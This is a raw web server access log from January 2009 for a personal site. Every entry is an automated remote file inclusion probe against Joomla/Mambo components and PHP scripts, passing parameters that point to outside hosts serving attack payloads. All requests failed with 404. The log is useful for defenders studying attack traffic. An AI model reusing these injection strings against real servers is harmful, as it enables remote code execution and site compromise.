66.7.216.240 - - [06/Jan/2009:05:12:04 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.thepointers.net"
41.250.251.52 - - [06/Jan/2009:05:13:39 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
41.250.251.52 - - [06/Jan/2009:05:13:39 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
41.250.251.52 - - [06/Jan/2009:05:13:39 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
69.94.45.22 - - [06/Jan/2009:05:13:53 -0800] "GET /logs/access_081010.log/appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:14:24 -0800] "GET /logs/access_081006.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
113.30.66.5 - - [06/Jan/2009:05:15:06 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.thepointers.net"
113.30.66.5 - - [06/Jan/2009:05:15:06 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.thepointers.net"
113.30.66.5 - - [06/Jan/2009:05:15:06 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.thepointers.net"
216.239.0.245 - - [06/Jan/2009:05:15:13 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
216.239.0.245 - - [06/Jan/2009:05:15:14 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
216.239.0.245 - - [06/Jan/2009:05:15:16 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:15:40 -0800] "GET /logs/access_081208.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:15:40 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:15:41 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:16:24 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:16:24 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:16:24 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.thepointers.net"
83.222.23.200 - - [06/Jan/2009:05:16:46 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.thepointers.net"
205.231.144.152 - - [06/Jan/2009:05:16:51 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.thepointers.net"
205.231.144.152 - - [06/Jan/2009:05:16:51 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://rusrezina.ru/img/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:16:55 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:16:56 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:16:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:16:59 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:17:00 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:17:01 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:03 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:05 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:06 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:11 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:12 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:18:16 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
83.222.23.200 - - [06/Jan/2009:05:19:07 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:19:10 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:10 -0800] "GET /logs/access_081206.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:11 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
200.49.188.178 - - [06/Jan/2009:05:19:11 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.thepointers.net"
200.49.188.178 - - [06/Jan/2009:05:19:11 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.thepointers.net"
200.49.188.178 - - [06/Jan/2009:05:19:11 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.thepointers.net"
41.250.251.52 - - [06/Jan/2009:05:19:17 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:28 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:28 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:19:28 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:19:29 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:19:29 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
89.36.165.22 - - [06/Jan/2009:05:19:29 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:19:49 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:19:49 -0800] "GET /logs/access_081208.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:19:49 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:19:52 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:19:52 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:19:52 -0800] "GET /logs/access_081208.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:20:52 -0800] "GET /logs/access_081208.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:20:52 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:20:52 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:05 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:05 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:05 -0800] "GET /logs/access_081206.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:08 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:08 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
89.149.209.64 - - [06/Jan/2009:05:21:08 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:21 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:21 -0800] "GET /logs/access_081206.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:24 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "thepointers.net"
77.74.198.93 - - [06/Jan/2009:05:21:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "thepointers.net"
216.239.0.245 - - [06/Jan/2009:05:21:35 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.thepointers.net"
113.30.66.5 - - [06/Jan/2009:05:22:05 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:35 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:35 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:35 -0800] "GET /logs/access_081206.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:40 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:40 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:24:40 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:25:38 -0800] "GET /logs/access_081002.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:26:29 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:26:30 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:26:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
84.19.190.18 - - [06/Jan/2009:05:26:45 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:26:57 -0800] "GET /logs/access_081206.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:26:57 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:26:57 -0800] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:27:09 -0800] "GET /logs/access_081002.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:27:31 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:27:32 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:27:33 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:27:48 -0800] "GET /logs/access_081002.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:28:25 -0800] "GET /logs/access_081002.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:28:36 -0800] "GET /logs/access_081205.log//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:28:36 -0800] "GET /logs/access_081205.log//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:28:36 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:28:37 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:28:39 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
